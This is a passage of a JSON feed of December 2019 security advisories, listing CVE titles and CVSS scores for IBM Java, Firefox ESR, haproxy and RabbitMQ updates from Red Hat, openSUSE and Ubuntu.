(CVE-2019-2945)\n\n* OpenJDK: NULL pointer dereference in DrawGlyphList (2D, 8222690) (CVE-2019-2962)\n\n* OpenJDK: Unexpected exception thrown by Pattern processing crafted regular expression (Concurrency, 8222684) (CVE-2019-2964)\n\n* OpenJDK: Unexpected exception thrown by XPathParser processing crafted XPath expression (JAXP, 8223505) (CVE-2019-2973)\n\n* OpenJDK: Unexpected exception thrown by XPath processing crafted XPath expression (JAXP, 8224532) (CVE-2019-2981)\n\n* OpenJDK: Unexpected exception thrown during Font object deserialization (Serialization, 8224915) (CVE-2019-2983)\n\n* OpenJDK: Integer overflow in bounds check in SunGraphics2D (2D, 8225292) (CVE-2019-2988)\n\n* OpenJDK: Excessive memory allocation in CMap when reading TrueType font (2D, 8225597) (CVE-2019-2992)\n\n* OpenJDK: Insufficient filtering of HTML event attributes in Javadoc (Javadoc, 8226765) (CVE-2019-2999)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-12-05T20:15:12", "published": "2019-12-05T20:01:31", "id": "RHSA-2019:4109", "href": "https://access.redhat.com/errata/RHSA-2019:4109", "type": "redhat", "title": "(RHSA-2019:4109) Moderate: java-1.7.1-ibm security update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-12-05T16:27:53", "bulletinFamily": "unix", "description": "Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 68.3.0 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: Use-after-free in worker destruction (CVE-2019-17008)\n\n* Mozilla: Memory safety bugs fixed in Firefox 71 and Firefox ESR 68.3 (CVE-2019-17012)\n\n* Mozilla: Buffer overflow in plain text serializer (CVE-2019-17005)\n\n* Mozilla: Use-after-free when performing device orientation checks (CVE-2019-17010)\n\n* Mozilla: Use-after-free when retrieving a document in antitracking (CVE-2019-17011)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-12-05T20:32:28", "published": "2019-12-05T20:00:15", "id": "RHSA-2019:4108", "href": "https://access.redhat.com/errata/RHSA-2019:4108", "type": "redhat", "title": "(RHSA-2019:4108) Critical: firefox security update", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-05T16:27:20", "bulletinFamily": "unix", "description": "Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.\n\nThis update upgrades Firefox to version 68.3.0 ESR.\n\nSecurity Fix(es):\n\n* Mozilla: Use-after-free in worker destruction (CVE-2019-17008)\n\n* Mozilla: Memory safety bugs fixed in Firefox 71 and Firefox ESR 68.3 (CVE-2019-17012)\n\n* Mozilla: Buffer overflow in plain text serializer (CVE-2019-17005)\n\n* Mozilla: Use-after-free when performing device orientation checks (CVE-2019-17010)\n\n* Mozilla: Use-after-free when retrieving a document in antitracking (CVE-2019-17011)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-12-05T20:32:59", "published": "2019-12-05T19:58:53", "id": "RHSA-2019:4107", "href": "https://access.redhat.com/errata/RHSA-2019:4107", "type": "redhat", "title": "(RHSA-2019:4107) Critical: firefox security update", "cvss": {"score": 0.0, "vector": "NONE"}}], "suse": [{"lastseen": "2019-12-05T03:26:47", "bulletinFamily": "unix", "description": "This update for haproxy to version 2.0.10 fixes the following issues:\n\n HAProxy was updated to 2.0.10\n\n Security issues fixed:\n\n - CVE-2019-18277: Fixed a potential HTTP smuggling in messages with\n transfer-encoding header missing the "chunked" (bsc#1154980).\n - Fixed an improper handling of headers which could have led to injecting\n LFs in H2-to-H1 transfers creating new attack space (bsc#1157712)\n - Fixed an issue where HEADER frames in idle streams are not rejected and\n thus trying to decode them HAPrpxy crashes (bsc#1157714).\n\n Other issue addressed:\n\n - Macro change in the spec file (bsc#1082318)\n\n More information regarding the release at:\n <a rel=\"nofollow\" href=\"http://git.haproxy.org/?p=haproxy-2.0.git;a=commit;h=ac198b92d461515551b95d\">http://git.haproxy.org/?p=haproxy-2.0.git;a=commit;h=ac198b92d461515551b95d</a>\n aae20954b3053ce87e\n\n This update was imported from the SUSE:SLE-15-SP1:Update update project.\n\n", "modified": "2019-12-05T00:15:11", "published": "2019-12-05T00:15:11", "id": "OPENSUSE-SU-2019:2645-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00019.html", "title": "Security update for haproxy (important)", "type": "suse", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "ubuntu": [{"lastseen": "2019-12-05T21:06:43", "bulletinFamily": "unix", "description": "It was discovered that RabbitMQ incorrectly handled certain inputs. An attacker could possibly use this issue to execute arbitrary code.", "modified": "2019-12-05T00:00:00", "published": "2019-12-05T00:00:00", "id": "USN-4214-1", "href": "https://usn.ubuntu.com/4214-1/", "title": "RabbitMQ vulnerability", "type": "ubuntu", "cvss": {"score": 0.0, "vector": "NONE"}}]}
